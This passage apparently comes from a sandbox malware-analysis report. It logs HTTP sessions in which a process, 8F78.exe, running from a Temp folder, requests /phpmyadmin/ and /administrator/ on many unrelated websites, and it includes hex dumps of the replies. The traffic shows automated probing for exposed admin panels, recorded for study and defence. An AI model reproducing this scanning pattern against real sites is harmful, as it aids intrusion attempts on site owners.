                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC221INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://www.sport-tour.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Content-Length: 245
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC245INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 70 6f 72 74 2d 74 6f 75 72 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.sport-tour.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                90192.168.2.454762178.238.43.2104435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: sport-tour.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC221INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://www.sport-tour.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Content-Length: 245
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC245INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 70 6f 72 74 2d 74 6f 75 72 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.sport-tour.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                91192.168.2.45478281.0.206.1044435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: izberatel.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC202INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.izberatel.sk/administrator/
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                92192.168.2.45479381.0.206.1044435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: izberatel.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC202INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.izberatel.sk/administrator/
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                93192.168.2.45490583.167.249.74435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC185OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC269INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/phpmyadmin
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC261INData Raw: 66 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d
                                                                                                                                                                                                                                                                                                                                Data Ascii: fa<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/phpmyadmin">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                94192.168.2.45490783.167.249.74435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC185OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC269INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/phpmyadmin
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC261INData Raw: 66 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d
                                                                                                                                                                                                                                                                                                                                Data Ascii: fa<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/phpmyadmin">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                95192.168.2.455456172.67.152.2284435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC174OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: keramat.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC705INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2VRX9WJjBPyltDtmR237UbxKbk%2BfjQtOIHqL9X1YRw49AIlcynEHAOXLcoK4QNrHdcMqHVYggVQWFzuQhuJWji%2FCQ4PLoVPfshizpahb0yn3lJi%2BlBPOEYtQ2oaN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3c53c8312245-MIA
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC202INData Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                96192.168.2.45553123.239.22.2024435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC184OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aexoden.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC278INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.10
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubdomains
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC27INData Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 10File not found.0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                97192.168.2.45549135.190.10.694435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC181OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: ericrothphoto.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC206INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: /administrator
                                                                                                                                                                                                                                                                                                                                X-Request-Id: e6ee2dd09fb511ee95531f60c19ab349
                                                                                                                                                                                                                                                                                                                                Server: None
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                98192.168.2.455596217.26.54.214435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elrocket.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC204INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                99192.168.2.45566723.239.22.202443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aexoden.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC207INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubdomains
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                100192.168.2.455771104.26.6.374435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC199OUTGET /domain_profile.cfm?d=hokal.com HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.hugedomains.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC790INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                set-cookie: site_version_phase=108; expires=Sun, 15-Dec-2024 04:03:31 GMT; path=/
                                                                                                                                                                                                                                                                                                                                set-cookie: site_version=HDv3; expires=Sun, 15-Dec-2024 04:03:31 GMT; path=/
                                                                                                                                                                                                                                                                                                                                x-powered-by: ASP.NET
                                                                                                                                                                                                                                                                                                                                lb: TclPrdLbHd3
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FWlQHhGBXruij0UA3xdkBtFdjIgN9tBuoVEugXpqz6nFYneE1oBwRUogenYynT3w9BKsaxtvoDcErXsBAde2f1cWr3kcIeORzsscabPTHRo6wBLOZTEvozwy2hq7cijwZuvef9w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3c576e879aeb-MIA
